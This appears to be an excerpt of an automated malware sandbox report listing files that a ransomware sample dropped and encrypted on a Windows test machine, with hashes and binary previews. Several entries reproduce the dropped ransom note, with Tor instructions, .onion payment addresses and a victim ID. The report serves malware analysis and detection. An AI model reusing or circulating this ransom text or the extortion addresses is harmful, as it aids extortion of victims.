                                                                                                                                                      SHA-512:F1445BC3874048F225C41A6B352C8C104018118792155B2806225943F36435036A781F3D564C91880C90F4F5EE7C7AD953BD01B10DB1F5D19D8A13228A591366
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ...z...R..;eo..[...*..p..`4m...%d5...4.@.D.L.F...[....|...p...b..6V....s..sd2 .V......X..R..c..z6..u4..>2..f.~.x...rrh.0.'..?...._|._..#...... -'...h......O.33....6.C.n.~h.X..J#...>...<.c..E....k.....CJ[..`.Y..g.M.2VOAa!......*.._s...!...\.4.........F.....q.:.!3..O..K...3....].5.#P../W,...$hF})..@.tw.....s.iG%.:..Tqm..%.b....?g..@..].i(0...P8...h. ....I.c..M#.%.z.3....;.<.K.~Q..i$n.....p....SnIHv;...OX.uA..6..{...+.r.p..F+........X..'............BW....?I..Bzj..`Y..s...^..O.@.|A........L9d.0.",.0....p....$.....K... .q.c.s;...s.Kf...Ea(.:q9.0"k.|.z..].I"..M1u<..W-...&.$r.*"<...a.....5..O..+.....Z......t.*.d:.F7.NAG.A.......V...5[e..f.... +l..A..v..D.G!../..*.....RT....6G.NF..xi.S..J.....O./u$0xn....o...[...?.wv..\.d..h .3L.Y..+!\.TJ:Q.Na.E...W{..ae..g..r.8.. s.{....`....3Ce..>l`..0....3xb'....3.bu.q."$.n.+.r..5..l}.y.9.B9u8......c!.47.6..R.;s.K.....$........Fo.KD....4..<wrp.'4.g..Q..4.l.....P\.#..(....^....?.Q%.3.b.iVn. .. ....+c.....
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):960
                                                                                                                                                      Entropy (8bit):5.019063342556034
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:1kLLJJEA9dzK8sevWAVgKTaCB7RZ0cHYIgtyUzQsaa0:1qJuidzCwgck38nsG
                                                                                                                                                      MD5:D6B37E161675BBC18FE78AC23A8E1A40
                                                                                                                                                      SHA1:B89E2F9D4B77A987816E0D6F8CADB94254E6D8C0
                                                                                                                                                      SHA-256:C05C8BF10A63D32F4112F0159294AD5900514133B50B9357E1945F3E42F7C998
                                                                                                                                                      SHA-512:9F6788B2A9BD32B9DF786050A4190353D1F9CC7377A67B36AD6BF06D4216B5EDC06D8F81783689DD7592879C38A7C6708AEE474BB60154720199C8E2D1D0C5DD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ........0S..s..............3...s.#..k....N.l..:...kH[.V#.<...V.V....r[,..$..z.u.L,*...".0DQ...R..X9...<Z.....k.ey.T.......x..`.oQ..1.T.|u67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74.u..I.;w.>G.'.i_ ._......yv.*.......|...cbW..ti.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):960
                                                                                                                                                      Entropy (8bit):4.975750997590821
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:c63IQqzK8sevWAVgKTaCB7RZ0cHYIgtyUz4xA:GQqzCwgck38m
                                                                                                                                                      MD5:CAB971420B54B0370D35CDF0A680A3BB
                                                                                                                                                      SHA1:D3CB20F66F4F337A57AB8F91B5DC8BB05329A5EF
                                                                                                                                                      SHA-256:35A95820FDC97BC13A0CA23134F86744257CF66A67964ADBD4B745F66554E00D
                                                                                                                                                      SHA-512:F0A81914586E57BB45317B47D0677E2F77C9412DDECCE6D971363D046D618E45A8CF7AD70C8D0275CABB0F1FA62B81C3348201BECA5DC4635EDE20C9C1076F14
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .S.~y...wX../+}_[".+,.L.*.v[.. ..sf..m.dmt@.\.....w.......Q..~.........E.$.x8..Su.....'.4.-I..oD..`..v......{....7.-.Y....2.Iz..?|4..c...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74...7]'v..6.m.k..5.f.'1o_e.d...........Q'...q..7.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1648
                                                                                                                                                      Entropy (8bit):6.690033380246828
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:DHkuOcXBeqKW+LH7R7UrLhPEmxJKxcY/4N7QqmMVN+KzK8sevWAVgKTaCB7RZ0cR:7njXBQW+LbR7MouRX+KzCwgck383
                                                                                                                                                      MD5:F76F037D2E0076D8FB410659B65E2F5B
                                                                                                                                                      SHA1:0FEEBDCB25ED8B641B7A837EEDDAEF61E12BB8F8
                                                                                                                                                      SHA-256:74A67E6727BCFBD1AC6E50F35B555AA2D2819E3F18B1950B4060BDCE47695AEC
                                                                                                                                                      SHA-512:BCD221377069EADA3237A3C9AE20DC30E6ADCA6AD672A81F47BE05CED05B614EC45565B58CBA5987B8D8F24285B85E214B7B2305B679996163813E381866A2E7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .a..b.@.0......DJ..9I4y..SR@..K.,....,d.#.2$...Up.,CD....."T.....f.].y...>..$.>.........U..~..K.k..e%.jP&.+...~.}._..."W...l..y..g.=..?..........#....V...].W..8\9M.s..y..s......_.e...W.I..js..d?./>$h.@..F.b.k...-%..v...Z.....i.&F..s.Lr.k..H...jU."...\1.hz[]`H..........'...>..pJ.v...-&.5....X.!P.'..~."+.......B..4...R..X.H....;..RCf?...R.[v...../:....I.b0X._...#X.7...V3.?o..!.L..MaXiD...R.>~j.2.[6.....f..5_........83.l..X.E...._.(..J:.<A........&u...t.}`....,~....m...%.^1<.q..%.Yipk ...S.]K!.......=.3.......`dc...to.Z~...c....T .R_.k..w.QRv....x..I-..C...f....k...t.H.K.......u.^.E%...[CR......[:.kZ.......R..U.>.....~.v...qP....k........U.o8.E.@.Xd.........ga..A..8.oDn..+..q...g.ip.)w7.....f... w..](..s.c/*'9....>....p|...2.-..2....,7.._h".x$$..\..2..9.=...6...|...!..7.1.8.!^H.r...967 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2064
                                                                                                                                                      Entropy (8bit):7.084249697663168
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:9gMlfZgI8UzDxjztZS+WGyg5K/VHSaxzCwgck383fZ:NL8oDFJFysK/pxzTEefZ
                                                                                                                                                      MD5:9D56323F354B2C9F18182065E85C969D
                                                                                                                                                      SHA1:5DE40E85A227425C03F80B6785EB6CA1C2F88247
                                                                                                                                                      SHA-256:6897F3D5238A18A1001369A81D9E527A7A1CED81B3A7DB171BB2D39796B03E08
                                                                                                                                                      SHA-512:477CA759E7F928C3CE45D8204CB777E1265196A5565E9A7C154322D6B6272FDB0388F39BA6CDE7553F56D6DF03AF6F38533B8C01B3BE0B59C4CDA53739B5BE91
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: o..,qI..._].1..#r..byK.E..Ap...x...Z>G.u...e.a...C....&..GcW......{.....h...|(E.\.6.e...D...g.q.?&...;)......jC..y.....A.@......A.:......%<...S..@'r...B.7........c...........-F\.]....kh.......i..I$.'4.......x] hE.....L.13..l........?..=:...wN....u.*..g6..p...7...n.:.=7w.....[Pf^...i.$.s.>1......X.......(C.[...,...VEu...v.kQ.l...b....J.c...:..N|.`.x..yf.T..9o......b.>y..3.+.b..JR8n ...C.?*F..[..Z..:N..S..U9.*.r:.5.o...d..f..t.-d.}P./.W.g.T........I. pa].5....#]Z.....9.<Ha..%...1.\..4q0K...Q...v...<9.&$ ;.y.4...""g...*..+r.t.K..&c.|......N..z2..=6...}..v...`.E.c..\._b<.J..tQWz"........q._&...SBI...`N...[...Z..y...s...}...$P!..D.i...HVa......R.....E.*..IU.H4p...am...+.~Ny&.`1{d.B.=........s^b.$..p..O..V......x..\.....]..+...5O..=..#j.........b..w[...+lW....W...si.....Y.x7..iV".}WR.A../..50.el"...,cA......+....8.D...{$"=.uA..IR... ...{..v...;...#.0.X.Ot....?.4a'..%/kFr.....%.pR.Z...C,.*.:X9m.^..2.I../..$.T..m.=Q.....Y<..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):960
                                                                                                                                                      Entropy (8bit):4.953861389103938
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:MTnGsNmzK8sevWAVgKTaCB7RZ0cHYIgtyUzJXhx:SnGsszCwgck38Sxx
                                                                                                                                                      MD5:E144EEF7364E5FE06756D4CCE555DD90
                                                                                                                                                      SHA1:73242D60D7F776088B5586B4519C31B0DA6A7365
                                                                                                                                                      SHA-256:ED517C542E7EBD7D1F59383FFAFB4458D5734D4F9949477A1FB5FEAB84FA839F
                                                                                                                                                      SHA-512:96927394C9F81D1CF55AEEF0ADD58D9E938F05767C7C1BDEF0802A01B1FD02E06598586D48021EDD27811F361E9390909FDD3DA4968D4711A7EC58D1646D0362
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .g..g..2..6i...-B.xA....=D..,......i.B....s....:R.O=....8G],..RK..M...Bw........z,..i..m.J"m;...J{......vk...v..Z.....p..T..*..?....W...N..67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74..a.#..(.].)z.A8|...J7..qQ.+.NC..... O...K....A..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1520
                                                                                                                                                      Entropy (8bit):6.5434476235107155
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:fZygOiHhBA2OWZe0b3Qu3PJ1H45am3izK8sevWAVgKTaCB7RZ0cHYIgtyUzEoEV:fUgOuB8WZem3Quc4/zCwgck38ka
                                                                                                                                                      MD5:C824115D952AD1937C406E448514204B
                                                                                                                                                      SHA1:D04F6AF3C8A562D3E66E00DF4676D8DF99AE2FA5
                                                                                                                                                      SHA-256:F8288D363692B39B5287AFFFC203083ED237D2EAA77C1CAE3377744AC2316E16
                                                                                                                                                      SHA-512:7E3B9EAA1163FB3F830D630B9356E9AA7C201EB25DD9022C0BF2E280C5E1273EDF95211C138CAD911FA878B26BFA957EE50CB160C5141E8D962F581E4CF37EC4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ty.4.>Iv.(.d8..B..kh./..........X.....j.i.,...Q...FY..S@.5.".|9.....nu..M.3&..".NV..%|..Q.g.:H..........m....4:.sT.(.C.I..M.9..jH.;...u.d..{.[.Z.0C..O..gA.3....P.E.Z...e.I.q....'}....{..5)k.;L..ZwI.Xx.%'.M."...R..E....#......+...Eb.9`s.j7..#.......!"...P.@Wj....LH&I.....O.b?...Q.&.,4z.<...bw...[.. i.i.......B...H.Q1i...b..m..={...3.<.E...M...[......pDY....k2Uq5k..`T.r........:(...~.l.\....8....X..\.....*...X'#.H%...Rp...-.v........j.S... .N..Mg..J......\...G...y|.......e...q..:...)..(C.O.2..k..]..&=.i...TO.....-(.e...,X....ZZ....=(.......t.B?5.p+..~,$.?..".q{q.4.H..B..*..V..2.i...8l.....S..i.'^.i..0/.P......h_.."u........I.ma.....O;=.^=..ja.p...%M.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2064
                                                                                                                                                      Entropy (8bit):7.070004809876532
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:bMRW+5u6htpFjU/slymvlHtBPpQ0txsrzCwgck38W:tQhtPFppP1vsrzTE1
                                                                                                                                                      MD5:D15761B093EAE8F99D7B49FE7BA50E9C
                                                                                                                                                      SHA1:49AFE83E987AC100685E87F2805DF8058AEE087A
                                                                                                                                                      SHA-256:22DDC51E686EA339F46FA46E9D6003C136EE85BA1841C6D57547EE75F32F0970
                                                                                                                                                      SHA-512:472CDA33BD091044EE05EF327C6336D8458F6B50E29D1CD875D0F837BC760E5E7FE6257323D4DE739F63F771CB8F913B5EF3BEE97DE590082C60C0BF93743649
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: p9............?4.A$.....t...d....<5./J.9I8...!0..>.........;.....WoP..+...@.....A...R.. ............97..J..F9.8.&n.v..3IXJ.m...U....?...!.%+>..r..!+SD'.t....1...J...E...#.|..E.7m...\m.^.V.v*...D...s.Y^...-.".4.w..+&Hv.)[_.H'O.V.*....W.&..a9.+2...el.c..}<...g."a..=...A.<q2.'.*84...C.>IQ.._7m.A9\b@^l....^1".{.f....B>>....n...GQ...........h0.T.C..5...Q..+..i..1...m..J....,..&Ds23..qa.r.e.xJ...,.D."o........`rl.2...R...-..p.E..h.st{$.ph.H..."v......a..X....B.....M..!..~..6..M.......6...3|.$P...........y.m..]d..k...'..L9/..A....Zg9(G.b."f......rj.Z..4 W..y......r.N(...oZ.4....~b..R....g^..`..c.>....z%.(..s..=....K..E&C.....3.....Pt......(.....-i....OO.z.,..J..~$......$...T.2b.5^...#.?...~b:A..\a46Q.FHYn..i]Eh9L..#f.....6%;a.c...[..i.......+....lO.\.'5...........=....~*s.w...!....O?j...W..Y4...9jm.|d08-.....F.d..L....v.p8f...'..O...H.w......^.Y...........>..".}.28i.h.y..ff..?..Y..pdV...\<I.L..q.w...I.m..>.t_...J{_...D......a9.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2064
                                                                                                                                                      Entropy (8bit):7.083853862357925
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:a3+GvRdklBQyo8OlKQ3wfQ5JzCwgck38hPn:grvOi8OlKQ3SQ5JzTECn
                                                                                                                                                      MD5:C7295A802B6FA45C8308D9AEA4BEFE3C
                                                                                                                                                      SHA1:E96CAD3764044FDCE0F5F34888F2B9E3A8BBEC1B
                                                                                                                                                      SHA-256:629F0CA70F6047211E76068523413F09BCB4FF5AC4A1B5E7D663954D0FDB654C
                                                                                                                                                      SHA-512:CC597A5AFADF8800013498F261CE63D6F02C8BD1B76B1439AB26B6414DE3DEB29BFA5D3925438C78D13439261D8218650C10BC9B10E0ED46EC9559A04061C14A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: !@zS...B..V..b...>..L...~....r._..o...$k.z.....j.......\.A.x..mA.k..x..p..g..f.*...2..O....z..T...x.B6...x.".ol..b8.k...m.+.M.L..Q..cBbhvj..hl m.>8...t..."... .}..hx?..jJ...o]..4..z.f.X......P..W....U.6....<&.r.......Z..e$.nl0.8.t...m.n..."..b._.@$.<..AV.*....P.G.L.a6Y...@.E..q.}..G....O.j1......^ ~h............Z..M.?f.......T.k.......,.?...Uy..[..1.Dg..H.....q......_......S0..s.......A..l..V.ca....K....C.9O.N....:e......?"...h&G....p..-}..u:M..Rb.!tW..v.q^P.L~T....b7d..v......:.(Y....W)X.z.<...n(...<A.*V%...F.._......?...~.q....}y....v....^...E.g...p:..........Y...8.l..+......M..l......Oe..<...z........X.g=......Y6.&...aL...u..l...b...Q...X.\.V............Z.....(.k..iyz..... . h.{O.k..@<..{ffz........[.......oY.M......p..LB.r..*.....<.lK.2L..IF". 7..~-..)'7.\aL..3./.S@>.W..m:..e..u(tq.z..hb..mJFt....r...U,..<...I...(.%3..9...U..u[i....&.A./.W....H'M...r.g.zI(Z....s./@...ex..............4...<?....=^.n.Z....;GS...[T&h..D..w....1....uh.u.1f.{..
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2064
                                                                                                                                                      Entropy (8bit):7.09076038997547
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:t5cua74Ghljo8ljubS0YwS8zCwgck38nb:k7dNazTEmb
                                                                                                                                                      MD5:CF9A9698A8C592CD041F2B41401DE344
                                                                                                                                                      SHA1:CFB19F892BEC91E3F7C03134EEFB91ABD5D93845
                                                                                                                                                      SHA-256:946F32CA03D9D9246B8E43490E736517073D33FC6A36C6BB4CD779E17CC17B7E
                                                                                                                                                      SHA-512:3FE5C4DF4E3722787E97648B57BD2063B656EA295CE1B8085B2273DEC6D2D66614A1D5272D55791BB9DDCA8F70231D01F946A141FE432E405EA41438BD5B9905
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .7v.u.2..k..).lW.q........yj.p.H.......-.3...O{..u.^T...Yb.|..P)\.....c.{...9...\.x......bs.....2...N...d..m..9_......l.....R.Vgc..\..8...I...B.5.......L....QbT1.}.4.1y";.#......=.`..ydW..L.&.P..hH.7K|G...!...LP..Z.|...wY.0.u..P>...{...c....7.h...x..}.T{?.....}..`S...E.RvFO`...\.........Q..[4.....7......oH*:.9...-.u{O.zrz.....u...p_.)..|9.OH./.E\......Oe.L.Y.v.yrZ.1..#.k.....Q..^o.fvxHEy..o...x...../..T..|.I..dl..e..Z...u.Xa.........){..+.. .L...3.p.B'9r9*]j.%....&.[.]P.e...W[.cQ......}x....K....l=........2..z.2........P.K.GL|._.O...4_..x....................6..y..L..L3..z.!.B.vI....v!...U..0.a.h...)rM.H=...#..m..X...`u..+.X....T>....'....g..G.lR......T0.Uz%.As...J....eH..h..BiURw.....7.}.l.L.8TG.(.m.z._H|Q...G6v:[.m.)u..W..y(...k..i............Mv4..DSx\.pt.@3p.G...G.<PG...`..k>.XWz.....ec*..F..=N;M.'. ....n...[....}.,.;A!.3l.I.3..<H.?'.oS.[.....MY.Y..]...M...L....;."...9..j.C6..5k...>...h3....O..B.U..u.e..c......8....*.S.\.d
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1392
                                                                                                                                                      Entropy (8bit):6.294873345272201
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:szMEP+qGEpBClyRmZKLVhwu3zK8sevWAVgKTaCB7RZ0cHYIgtyUzAICqR:sz7P+qdu6mZKLwu3zCwgck38dVqR
                                                                                                                                                      MD5:93AA0BF927A8CFA7A148CB57A0B4C85E
                                                                                                                                                      SHA1:A314281B68FED3F986F30207BA98C7EFC42ACA6F
                                                                                                                                                      SHA-256:0D31B89595D97DDFED0E85EC5F6D813F02418C1F1A84A9CDAEAFC386BA2ACB7D
                                                                                                                                                      SHA-512:E178070D0FFAAA5BFFF541CCF6DF158B8A8D5E5A735751A1A4AABE3AA2B9309034E6869CA768B8651106F690884E69DA9518305E7C6EAE2C326352007F20C7AE
                                                                                                                                                      Malicious:false
